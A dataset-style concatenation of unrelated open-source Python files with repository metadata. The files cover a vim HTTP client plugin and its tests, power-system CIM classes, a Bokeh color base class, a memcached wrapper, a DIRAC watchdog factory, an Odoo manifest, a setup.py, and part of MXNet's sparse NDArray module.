data = None
response = requests.request(method, url, verify=verify_ssl, headers=headers, data=data, files=files, json=json_data)
content_type = response.headers.get('Content-Type', '').split(';')[0]
response_body = response.text
if JSON_REGEX.search(content_type):
content_type = 'application/json'
try:
response_body = json.dumps(
json.loads(response.text), sort_keys=True, indent=2,
separators=(',', ': '),
ensure_ascii=vim.eval('g:http_client_json_escape_utf')=='1')
except ValueError:
pass
display = (
response_body.split('\n') +
['', '// status code: %s' % response.status_code] +
['// %s: %s' % (k, v) for k, v in response.headers.items()]
)
return display, content_type
# Vim methods.
def vim_filetypes_by_content_type():
return {
'application/json': vim.eval('g:http_client_json_ft'),
'application/xml': 'xml',
'text/html': 'html'
}
BUFFER_NAME = '__HTTP_Client_Response__'
def find_block(buf, line_num):
length = len(buf)
is_buffer_terminator = lambda s: s.strip() == ''
block_start = line_num
while block_start > 0 and not is_buffer_terminator(buf[block_start]):
block_start -= 1
block_end = line_num
while block_end < length and not is_buffer_terminator(buf[block_end]):
block_end += 1
return buf[block_start:block_end + 1]
def open_scratch_buffer(contents, filetype):
previous_window = vim.current.window
existing_buffer_window_id = vim.eval('bufwinnr("%s")' % BUFFER_NAME)
if existing_buffer_window_id == '-1':
if vim.eval('g:http_client_result_vsplit') == '1':
split_cmd = 'vsplit'
else:
split_cmd = 'split'
vim.command('rightbelow %s %s' % (split_cmd, BUFFER_NAME))
vim.command('setlocal buftype=nofile nospell')
else:
vim.command('%swincmd w' % existing_buffer_window_id)
vim.command('set filetype=%s' % filetype)
write_buffer(contents, vim.current.buffer)
if vim.eval('g:http_client_focus_output_window') != '1':
vim.current.window = previous_window
def do_request_from_buffer():
win = vim.current.window
line_num = win.cursor[0] - 1
block = find_block(win.buffer, line_num)
result = do_request(block, win.buffer)
if result:
response, content_type = result
vim_ft = vim_filetypes_by_content_type().get(content_type, 'text')
open_scratch_buffer(response, vim_ft)
def write_buffer(contents, buffer):
if vim.eval('g:http_client_preserve_responses') == '1':
if len(buffer):
buffer[0:0] = [""]
buffer[0:0] = contents
vim.command('0')
else:
buffer[:] = contents
# Tests.
def run_tests():
import json
def extract_json(resp):
return json.loads(''.join([ l for l in resp[0] if not l.startswith('//') ]))
def test(assertion, test):
print('Test %s: %s' % ('passed' if assertion else 'failed', test))
if not assertion:
raise AssertionError
resp = extract_json(do_request([
'# comment',
'# :a=barf',
'GET http://httpbin.org/headers',
'X-Hey: :a',
'# comment'
], []))
test(resp['headers']['X-Hey'] == 'barf', 'Headers are passed with variable substitution.')
resp = extract_json(do_request([
'# :a = barf',
'GET http://httpbin.org/get?data=:a'
], []))
test(resp['args']['data'] == 'barf', 'GET data is passed with variable substitution.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'some data'
], []))
test(resp['data'] == 'some data', 'POST data is passed with variable substitution.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
], []))
test(resp['form']['forma'] == 'a', 'POST form data is passed.')
resp = extract_json(do_request([
'POST http://$global/post',
'forma=a',
'formb=b',
], [ '# $global = httpbin.org']))
test(resp['form']['forma'] == 'a', 'Global variables are substituted.')
import os
from tempfile import NamedTemporaryFile
SAMPLE_FILE_CONTENT = 'sample file content'
temp_file = NamedTemporaryFile(delete = False)
temp_file.write(SAMPLE_FILE_CONTENT)
temp_file.close()
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
"formc=!file(%s)" % temp_file.name,
], []))
test(resp['files']['formc'] == SAMPLE_FILE_CONTENT, 'Files given as path are sent properly.')
test(not 'formc' in resp['form'], 'File not included in form data.')
os.unlink(temp_file.name)
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
"formc=!content(%s)" % SAMPLE_FILE_CONTENT,
], []))
test(resp['files']['formc'] == SAMPLE_FILE_CONTENT, 'Files given as content are sent properly.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
"c=!content(foo \\(bar\\))",
], []))
test(resp['files']['c'] == 'foo (bar)', 'Escaped parenthesis should be unescaped during request')
if from_cmdline:
run_tests()
|
aquach/vim-http-client
|
plugin/http_client.py
|
Python
|
mit
| 8,172 | 0.005996 |
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.ENTSOE.Dynamics.IEC61970.Core.CorePowerSystemResource import CorePowerSystemResource
class ExcitationSystemsExcAC3A(CorePowerSystemResource):
def __init__(self, ta=0.0, ka=0.0, kd=0.0, se1=0.0, kc=0.0, se2=0.0, te=0.0, tf=0.0, tb=0.0, tc=0.0, vamax=0.0, kf=0.0, vemin=0.0, ke=0.0, vfemax=0.0, tr=0.0, e2=0.0, e1=0.0, kn=0.0, vamin=0.0, kr=0.0, efdn=0.0, *args, **kw_args):
"""Initialises a new 'ExcitationSystemsExcAC3A' instance.
@param ta:
@param ka:
@param kd:
@param se1:
@param kc:
@param se2:
@param te:
@param tf:
@param tb:
@param tc:
@param vamax:
@param kf:
@param vemin:
@param ke:
@param vfemax:
@param tr:
@param e2:
@param e1:
@param kn:
@param vamin:
@param kr:
@param efdn:
"""
self.ta = ta
self.ka = ka
self.kd = kd
self.se1 = se1
self.kc = kc
self.se2 = se2
self.te = te
self.tf = tf
self.tb = tb
self.tc = tc
self.vamax = vamax
self.kf = kf
self.vemin = vemin
self.ke = ke
self.vfemax = vfemax
self.tr = tr
self.e2 = e2
self.e1 = e1
self.kn = kn
self.vamin = vamin
self.kr = kr
self.efdn = efdn
super(ExcitationSystemsExcAC3A, self).__init__(*args, **kw_args)
_attrs = ["ta", "ka", "kd", "se1", "kc", "se2", "te", "tf", "tb", "tc", "vamax", "kf", "vemin", "ke", "vfemax", "tr", "e2", "e1", "kn", "vamin", "kr", "efdn"]
_attr_types = {"ta": float, "ka": float, "kd": float, "se1": float, "kc": float, "se2": float, "te": float, "tf": float, "tb": float, "tc": float, "vamax": float, "kf": float, "vemin": float, "ke": float, "vfemax": float, "tr": float, "e2": float, "e1": float, "kn": float, "vamin": float, "kr": float, "efdn": float}
_defaults = {"ta": 0.0, "ka": 0.0, "kd": 0.0, "se1": 0.0, "kc": 0.0, "se2": 0.0, "te": 0.0, "tf": 0.0, "tb": 0.0, "tc": 0.0, "vamax": 0.0, "kf": 0.0, "vemin": 0.0, "ke": 0.0, "vfemax": 0.0, "tr": 0.0, "e2": 0.0, "e1": 0.0, "kn": 0.0, "vamin": 0.0, "kr": 0.0, "efdn": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
rwl/PyCIM
|
CIM14/ENTSOE/Dynamics/IEC61970/Dynamics/ExcitationSystems/ExcitationSystemsExcAC3A.py
|
Python
|
mit
| 3,453 | 0.01448 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a base class for representing color values.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
from bokeh.util.api import public, internal ; public, internal
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Public API
#-----------------------------------------------------------------------------
@public((1,0,0))
class Color(object):
''' A base class for representing color objects.
'''
def __repr__(self):
return self.to_css()
@staticmethod
@public((1,0,0))
def clamp(value, maximum=None):
''' Clamp numeric values to be non-negative, an optionally, less than a
given maximum.
Args:
value (float) :
A number to clamp.
maxiumum (float, optional) :
A max bound to to clamp to. If None, there is no upper bound,
and values are only clamped to be non-negative. (default: None)
Returns:
float
'''
value = max(value, 0)
if maximum is not None:
return min(value, maximum)
else:
return value
@public((1,0,0))
def copy(self):
''' Copy this color.
*Subclasses must implement this method.*
'''
raise NotImplementedError
@public((1,0,0))
def darken(self, amount):
''' Darken (reduce the luminance) of this color.
Args:
amount (float) :
Amount to reduce the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l - amount)
return self.from_hsl(hsl)
@classmethod
@public((1,0,0))
def from_hsl(cls, value):
''' Create a new color by converting from an HSL color.
*Subclasses must implement this method.*
Args:
value (HSL) :
A color to convert from HSL
Returns:
Color
'''
raise NotImplementedError
@classmethod
@public((1,0,0))
def from_rgb(cls, value):
''' Create a new color by converting from an RGB color.
*Subclasses must implement this method.*
Args:
value (:class:`~bokeh.colors.rgb.RGB`) :
A color to convert from RGB
Returns:
Color
'''
raise NotImplementedError
@public((1,0,0))
def lighten(self, amount):
''' Lighten (increase the luminance) of this color.
Args:
amount (float) :
Amount to increase the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l + amount, 1)
return self.from_hsl(hsl)
@public((1,0,0))
def to_css(self):
''' Return a CSS representation of this color.
*Subclasses must implement this method.*
Returns:
str
'''
raise NotImplementedError
@public((1,0,0))
def to_hsl(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
HSL
'''
raise NotImplementedError
@public((1,0,0))
def to_rgb(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
:class:`~bokeh.colors.rgb.RGB`
'''
raise NotImplementedError
#-----------------------------------------------------------------------------
# Internal API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
philippjfr/bokeh
|
bokeh/colors/color.py
|
Python
|
bsd-3-clause
| 5,085 | 0.00885 |
# -*- coding: utf-8 -*-
from .. import server, utils
class Memcached(server.Server):
binary = 'memcached'
def init(self, **kwargs):
self.binary = utils.find_binary(kwargs.get('memcached_bin', self.binary))
assert 'ip' in kwargs, "memcached servers requires <ip> option"
self.ip = kwargs['ip']
assert 'port' in kwargs, "memcached server require <port> option"
self.port = kwargs['port']
self.command = [ self.binary, '-l', self.ip, '-p', self.port ]
|
mialinx/testenv
|
testenv/contrib/memcached.py
|
Python
|
mit
| 510 | 0.005882 |
""" The Watchdog Factory instantiates a given Watchdog based on a quick
determination of the local operating system.
"""
__RCSID__ = "$Id$"
import re
import platform
from DIRAC import S_OK, S_ERROR, gLogger
class WatchdogFactory( object ):
#############################################################################
def __init__(self):
""" Standard constructor
"""
self.version = platform.uname()
self.log = gLogger.getSubLogger( 'WatchdogFactory' )
self.watchDogsLocation = 'DIRAC.WorkloadManagementSystem.JobWrapper'
#############################################################################
def getWatchdog( self, pid, exeThread, spObject, jobCPUTime, memoryLimit, processors = 1, jobArgs = {} ):
""" This method returns the CE instance corresponding to the local OS. The Linux watchdog is returned by default.
"""
if re.search( 'Darwin', self.version[0] ):
localOS = 'Mac'
self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
# elif re.search( 'Windows', self.version[0] ):
# localOS = 'Windows'
# self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
else:
localOS = 'Linux'
self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
subClassName = "Watchdog%s" % ( localOS )
try:
wdModule = __import__( self.watchDogsLocation + '.%s' % subClassName, globals(), locals(), [subClassName] )
except ImportError as e:
self.log.exception( "Failed to import module" + self.watchDogsLocation + '.%s' % subClassName + '.%s' % subClassName + ': ' + str(e) )
return S_ERROR( "Failed to import module" )
try:
wd_o = getattr( wdModule, subClassName )( pid = pid,
exeThread = exeThread,
spObject = spObject,
jobCPUTime = jobCPUTime,
memoryLimit = memoryLimit,
processors = processors,
jobArgs = jobArgs )
return S_OK( wd_o )
except AttributeError as e:
self.log.exception( "Failed to create %s(): %s." % ( subClassName, e ) )
return S_ERROR( "Failed to create object" )
#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
andresailer/DIRAC
|
WorkloadManagementSystem/JobWrapper/WatchdogFactory.py
|
Python
|
gpl-3.0
| 2,478 | 0.033495 |
# -*- coding: utf-8 -*-
# © 2017 Didotech srl (www.didotech.com)
{
"name": "BoM Warning",
"version": "4.0.1.2",
"depends": [
"mrp",
"base",
"product",
"warning"
],
"author": "Didotech srl",
"description": """
This module is aim to track the warning on Bills of Material.
""",
"website": "https://www.didotech.com",
"category": "Manufacture Resource Planning",
"data": [
'views/product_view.xml',
'views/mrp_bom_view.xml'
],
"demo": [],
"active": False,
"installable": True,
}
|
iw3hxn/LibrERP
|
mrp_bom_warning/__openerp__.py
|
Python
|
agpl-3.0
| 588 | 0.001704 |
#!/usr/bin/env python3
print("this is a test program to see if")
print("we can make a new file in github")
print("and push it to the hub.")
|
nap-complex/pythonPractice
|
newFile.py
|
Python
|
gpl-3.0
| 143 | 0.006993 |
from distutils.core import setup
import os
from teams import get_version
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('teams'):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
elif filenames:
prefix = dirpath[13:] # Strip "teams/" or "teams\"
for f in filenames:
data_files.append(os.path.join(prefix, f))
setup(name='django-teams',
version=get_version().replace(' ', '-'),
description='django-teams',
author='Charly Wilhelm',
author_email='charly.wilhelm@gmail.com',
url='https://github.com/cwilhelm/django-teams/wiki',
download_url='https://github.com/cwilhelm/django-teams/zipball/master',
package_dir={'teams': 'teams'},
packages=packages,
package_data={'teams': data_files},
classifiers=['Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities'],
)
|
cwilhelm/django-teams
|
setup.py
|
Python
|
bsd-3-clause
| 1,758 | 0.001706 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import, unused-wildcard-import, too-many-lines
"""Sparse NDArray API of MXNet."""
from __future__ import absolute_import
from __future__ import division
try:
from __builtin__ import slice as py_slice
from __builtin__ import sum as py_sum
except ImportError:
from builtins import slice as py_slice
from builtins import sum as py_sum
import ctypes
import warnings
from array import array as native_array
__all__ = ["_ndarray_cls", "csr_matrix", "row_sparse_array",
"BaseSparseNDArray", "CSRNDArray", "RowSparseNDArray"]
import numpy as np
from ..base import NotSupportedForSparseNDArray
from ..base import _LIB, numeric_types
from ..base import c_array_buf, mx_real_t, integer_types
from ..base import mx_uint, NDArrayHandle, check_call
from ..context import Context
from . import _internal
from . import op
try:
from .gen_sparse import * # pylint: disable=redefined-builtin
except ImportError:
pass
from ._internal import _set_ndarray_class
from .ndarray import NDArray, _storage_type, _DTYPE_NP_TO_MX, _DTYPE_MX_TO_NP
from .ndarray import _STORAGE_TYPE_STR_TO_ID, _STORAGE_TYPE_ROW_SPARSE, _STORAGE_TYPE_CSR
from .ndarray import _STORAGE_TYPE_UNDEFINED, _STORAGE_TYPE_DEFAULT
from .ndarray import zeros as _zeros_ndarray
from .ndarray import array as _array
try:
import scipy.sparse as spsp
except ImportError:
spsp = None
_STORAGE_AUX_TYPES = {
'row_sparse': [np.int64],
'csr': [np.int64, np.int64]
}
def _new_alloc_handle(stype, shape, ctx, delay_alloc, dtype, aux_types, aux_shapes=None):
"""Return a new handle with specified storage type, shape, dtype and context.
Empty handle is only used to hold results
Returns
-------
handle
A new empty ndarray handle
"""
hdl = NDArrayHandle()
for aux_t in aux_types:
if np.dtype(aux_t) != np.dtype("int64"):
raise NotImplementedError("only int64 is supported for aux types")
aux_type_ids = [int(_DTYPE_NP_TO_MX[np.dtype(aux_t).type]) for aux_t in aux_types]
aux_shapes = [(0,) for aux_t in aux_types] if aux_shapes is None else aux_shapes
aux_shape_lens = [len(aux_shape) for aux_shape in aux_shapes]
aux_shapes = py_sum(aux_shapes, ())
num_aux = mx_uint(len(aux_types))
check_call(_LIB.MXNDArrayCreateSparseEx(
ctypes.c_int(int(_STORAGE_TYPE_STR_TO_ID[stype])),
c_array_buf(mx_uint, native_array('I', shape)),
mx_uint(len(shape)),
ctypes.c_int(ctx.device_typeid),
ctypes.c_int(ctx.device_id),
ctypes.c_int(int(delay_alloc)),
ctypes.c_int(int(_DTYPE_NP_TO_MX[np.dtype(dtype).type])),
num_aux,
c_array_buf(ctypes.c_int, native_array('i', aux_type_ids)),
c_array_buf(mx_uint, native_array('I', aux_shape_lens)),
c_array_buf(mx_uint, native_array('I', aux_shapes)),
ctypes.byref(hdl)))
return hdl
class BaseSparseNDArray(NDArray):
"""The base class of an NDArray stored in a sparse storage format.
See CSRNDArray and RowSparseNDArray for more details.
"""
def __repr__(self):
"""Returns a string representation of the sparse array."""
shape_info = 'x'.join(['%d' % x for x in self.shape])
# The data content is not displayed since the array usually has big shape
return '\n<%s %s @%s>' % (self.__class__.__name__,
shape_info, self.context)
def __iadd__(self, other):
raise NotImplementedError()
def __isub__(self, other):
raise NotImplementedError()
def __imul__(self, other):
raise NotImplementedError()
def __idiv__(self, other):
raise NotImplementedError()
def __itruediv__(self, other):
raise NotImplementedError()
def _sync_copyfrom(self, source_array):
raise NotImplementedError()
def _at(self, idx):
raise NotSupportedForSparseNDArray(self._at, '[idx]', idx)
def _slice(self, start, stop):
raise NotSupportedForSparseNDArray(self._slice, None, start, stop)
def reshape(self, shape):
raise NotSupportedForSparseNDArray(self.reshape, None, shape)
@property
def size(self):
# the `size` for a sparse ndarray is ambiguous, hence disabled.
raise NotImplementedError()
def _aux_type(self, i):
"""Data-type of the array's ith aux data.
Returns
-------
numpy.dtype
This BaseSparseNDArray's aux data type.
"""
aux_type = ctypes.c_int()
check_call(_LIB.MXNDArrayGetAuxType(self.handle, i, ctypes.byref(aux_type)))
return _DTYPE_MX_TO_NP[aux_type.value]
@property
def _num_aux(self):
"""The number of aux data used to help store the sparse ndarray.
"""
return len(_STORAGE_AUX_TYPES[self.stype])
@property
def _aux_types(self):
"""The data types of the aux data for the BaseSparseNDArray.
"""
aux_types = []
num_aux = self._num_aux
for i in range(num_aux):
aux_types.append(self._aux_type(i))
return aux_types
def asnumpy(self):
"""Return a dense ``numpy.ndarray`` object with value copied from this array
"""
return self.tostype('default').asnumpy()
def astype(self, dtype):
"""Returns a copy of the array after casting to a specified type.
Parameters
----------
dtype : numpy.dtype or str
The type of the returned array.
Examples
--------
>>> x = mx.nd.sparse.zeros('row_sparse', (2,3), dtype='float32')
>>> y = x.astype('int32')
>>> y.dtype
<type 'numpy.int32'>
"""
res = zeros(shape=self.shape, ctx=self.context,
dtype=dtype, stype=self.stype)
self.copyto(res)
return res
def copyto(self, other):
"""Copies the value of this array to another array.
Parameters
----------
other : NDArray or CSRNDArray or RowSparseNDArray or Context
The destination array or context.
Returns
-------
NDArray or CSRNDArray or RowSparseNDArray
The copied array.
"""
if isinstance(other, NDArray):
if other.handle is self.handle:
warnings.warn('You are attempting to copy an array to itself', RuntimeWarning)
return
return _internal._copyto(self, out=other)
elif isinstance(other, Context):
hret = _ndarray_cls(_new_alloc_handle(self.stype, self.shape, other,
True, self.dtype, self._aux_types))
return _internal._copyto(self, out=hret)
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def check_format(self, full_check=True):
"""Check whether the NDArray format is valid.
Parameters
----------
full_check : bool, optional
If `True`, rigorous check, O(N) operations. Otherwise
basic check, O(1) operations (default True).
"""
check_call(_LIB.MXNDArraySyncCheckFormat(self.handle, ctypes.c_bool(full_check)))
def _data(self):
"""A deep copy NDArray of the data array associated with the BaseSparseNDArray.
This function blocks. Do not use it in performance critical code.
"""
self.wait_to_read()
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayGetDataNDArray(self.handle, ctypes.byref(hdl)))
return NDArray(hdl)
def _aux_data(self, i):
""" Get a deep copy NDArray of the i-th aux data array associated with the
BaseSparseNDArray.
This function blocks. Do not use it in performance critical code.
"""
self.wait_to_read()
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayGetAuxNDArray(self.handle, i, ctypes.byref(hdl)))
return NDArray(hdl)
# pylint: disable=abstract-method
class CSRNDArray(BaseSparseNDArray):
"""A sparse representation of 2D NDArray in the Compressed Sparse Row format.
A CSRNDArray represents an NDArray as three separate arrays: `data`,
`indptr` and `indices`. It uses the CSR representation where the column indices for
row i are stored in ``indices[indptr[i]:indptr[i+1]]`` and their corresponding values are stored
in ``data[indptr[i]:indptr[i+1]]``.
The column indices for a given row are expected to be sorted in ascending order.
Duplicate column entries for the same row are not allowed.
Example
-------
>>> a = mx.nd.array([[0, 1, 0], [2, 0, 0], [0, 0, 0], [0, 0, 3]])
>>> a = a.tostype('csr')
>>> a.data.asnumpy()
array([ 1., 2., 3.], dtype=float32)
>>> a.indices.asnumpy()
array([1, 0, 2])
>>> a.indptr.asnumpy()
array([0, 1, 2, 2, 3])
See Also
--------
csr_matrix: Several ways to construct a CSRNDArray
"""
def __reduce__(self):
return CSRNDArray, (None,), super(CSRNDArray, self).__getstate__()
def __iadd__(self, other):
(self + other).copyto(self)
return self
def __isub__(self, other):
(self - other).copyto(self)
return self
def __imul__(self, other):
(self * other).copyto(self)
return self
def __idiv__(self, other):
(self / other).copyto(self)
return self
def __itruediv__(self, other):
(self / other).copyto(self)
return self
def __getitem__(self, key):
"""x.__getitem__(i) <=> x[i]
Returns a sliced view of this array.
Parameters
----------
key : int or slice
Indexing key.
Examples
--------
>>> indptr = np.array([0, 2, 3, 6])
>>> indices = np.array([0, 2, 2, 0, 1, 2])
>>> data = np.array([1, 2, 3, 4, 5, 6])
>>> a = mx.nd.sparse.csr_matrix((data, indices, indptr), shape=(3, 3))
>>> a.asnumpy()
array([[ 1., 0., 2.],
[ 0., 0., 3.],
[ 4., 5., 6.]], dtype=float32)
>>> a[1:2].asnumpy()
array([[ 0., 0., 3.]], dtype=float32)
>>> a[1].asnumpy()
array([[ 0., 0., 3.]], dtype=float32)
>>> a[-1].asnumpy()
array([[ 4., 5., 6.]], dtype=float32)
"""
if isinstance(key, int):
if key == -1:
begin = self.shape[0] - 1
else:
begin = key
return op.slice(self, begin=begin, end=begin+1)
if isinstance(key, py_slice):
if key.step is not None:
raise ValueError('CSRNDArray only supports continuous slicing on axis 0')
if key.start is not None or key.stop is not None:
begin = key.start if key.start else 0
end = key.stop if key.stop else self.shape[0]
return op.slice(self, begin=begin, end=end)
else:
return self
if isinstance(key, tuple):
raise ValueError('Multi-dimension indexing is not supported')
def __setitem__(self, key, value):
"""x.__setitem__(i, y) <=> x[i]=y
Set self[key] to value. Only slice key [:] is supported.
Parameters
----------
key : slice
The indexing key.
value : NDArray or CSRNDArray or numpy.ndarray
The value to set.
Examples
--------
>>> src = mx.nd.sparse.zeros('csr', (3,3))
>>> src.asnumpy()
array([[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
>>> # assign CSRNDArray with same storage type
>>> x = mx.nd.ones('row_sparse', (3,3)).tostype('csr')
>>> x[:] = src
>>> x.asnumpy()
array([[ 1., 1., 1.],
[ 1., 1., 1.],
[ 1., 1., 1.]], dtype=float32)
>>> # assign NDArray to CSRNDArray
>>> x[:] = mx.nd.ones((3,3)) * 2
>>> x.asnumpy()
array([[ 2., 2., 2.],
[ 2., 2., 2.],
[ 2., 2., 2.]], dtype=float32)
"""
if not self.writable:
raise ValueError('Failed to assign to a readonly CSRNDArray')
if isinstance(key, py_slice):
if key.step is not None or key.start is not None or key.stop is not None:
raise ValueError('Assignment with slice for CSRNDArray is not ' \
'implmented yet.')
if isinstance(value, NDArray):
# avoid copying to itself
if value.handle is not self.handle:
value.copyto(self)
elif isinstance(value, numeric_types):
raise ValueError("Assigning numeric types to CSRNDArray is " \
"not implemented yet.")
elif isinstance(value, (np.ndarray, np.generic)):
# TODO(haibin/anisub) check scipy.sparse and use _sync_copy_from to
# avoid the temporary copy
warnings.warn('Assigning non-NDArray object to CSRNDArray is not efficient',
RuntimeWarning)
tmp = _array(value)
tmp.copyto(self)
else:
raise TypeError('type %s not supported' % str(type(value)))
else:
assert(isinstance(key, (int, tuple)))
raise Exception('CSRNDArray only supports [:] for assignment')
@property
def indices(self):
"""A deep copy NDArray of the indices array of the CSRNDArray.
This generates a deep copy of the column indices of the current `csr` matrix.
Returns
-------
NDArray
This CSRNDArray's indices array.
"""
return self._aux_data(1)
@property
def indptr(self):
"""A deep copy NDArray of the indptr array of the CSRNDArray.
This generates a deep copy of the `indptr` of the current `csr` matrix.
Returns
-------
NDArray
This CSRNDArray's indptr array.
"""
return self._aux_data(0)
@property
def data(self):
"""A deep copy NDArray of the data array of the CSRNDArray.
This generates a deep copy of the `data` of the current `csr` matrix.
Returns
-------
NDArray
This CSRNDArray's data array.
"""
return self._data()
@indices.setter
def indices(self, indices):
raise NotImplementedError()
@indptr.setter
def indptr(self, indptr):
raise NotImplementedError()
@data.setter
def data(self, data):
raise NotImplementedError()
def tostype(self, stype):
"""Return a copy of the array with chosen storage type.
Returns
-------
NDArray or CSRNDArray
A copy of the array with the chosen storage stype
"""
if stype == 'row_sparse':
raise ValueError("cast_storage from csr to row_sparse is not supported")
return op.cast_storage(self, stype=stype)
def copyto(self, other):
"""Copies the value of this array to another array.
If ``other`` is a ``NDArray`` or ``CSRNDArray`` object, then ``other.shape`` and
``self.shape`` should be the same. This function copies the value from
``self`` to ``other``.
If ``other`` is a context, a new ``CSRNDArray`` will be first created on
the target context, and the value of ``self`` is copied.
Parameters
----------
other : NDArray or CSRNDArray or Context
The destination array or context.
Returns
-------
NDArray or CSRNDArray
The copied array. If ``other`` is an ``NDArray`` or ``CSRNDArray``, then the return
value and ``other`` will point to the same ``NDArray`` or ``CSRNDArray``.
"""
if isinstance(other, Context):
return super(CSRNDArray, self).copyto(other)
elif isinstance(other, NDArray):
stype = other.stype
if stype == 'default' or stype == 'csr':
return super(CSRNDArray, self).copyto(other)
else:
raise TypeError('copyto does not support destination NDArray stype ' + str(stype))
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def asscipy(self):
"""Returns a ``scipy.sparse.csr.csr_matrix`` object with value copied from this array
Examples
--------
>>> x = mx.nd.sparse.zeros('csr', (2,3))
>>> y = x.asscipy()
>>> type(y)
<type 'scipy.sparse.csr.csr_matrix'>
>>> y
<2x3 sparse matrix of type '<type 'numpy.float32'>'
with 0 stored elements in Compressed Sparse Row format>
"""
data = self.data.asnumpy()
indices = self.indices.asnumpy()
indptr = self.indptr.asnumpy()
if not spsp:
raise ImportError("scipy is not available. \
Please check if the scipy python bindings are installed.")
return spsp.csr_matrix((data, indices, indptr), shape=self.shape, dtype=self.dtype)
# pylint: disable=abstract-method
class RowSparseNDArray(BaseSparseNDArray):
"""A sparse representation of a set of NDArray row slices at given indices.
A RowSparseNDArray represents a multidimensional NDArray using two separate arrays: `data` and
`indices`. The number of dimensions has to be at least 2.
- data: an NDArray of any dtype with shape [D0, D1, ..., Dn].
- indices: a 1-D int64 NDArray with shape [D0] with values sorted in ascending order.
The `indices` stores the indices of the row slices with non-zeros,
while the values are stored in `data`. The corresponding NDArray ``dense``
represented by RowSparseNDArray ``rsp`` has
``dense[rsp.indices[i], :, :, :, ...] = rsp.data[i, :, :, :, ...]``
>>> dense.asnumpy()
array([[ 1., 2., 3.],
[ 0., 0., 0.],
[ 4., 0., 5.],
[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
>>> rsp = dense.tostype('row_sparse')
>>> rsp.indices.asnumpy()
array([0, 2], dtype=int64)
>>> rsp.data.asnumpy()
array([[ 1., 2., 3.],
[ 4., 0., 5.]], dtype=float32)
A RowSparseNDArray is typically used to represent non-zero row slices of a large NDArray
of shape [LARGE0, D1, .. , Dn] where LARGE0 >> D0 and most row slices are zeros.
RowSparseNDArray is used principally in the definition of gradients for operations
that have sparse gradients (e.g. sparse dot and sparse embedding).
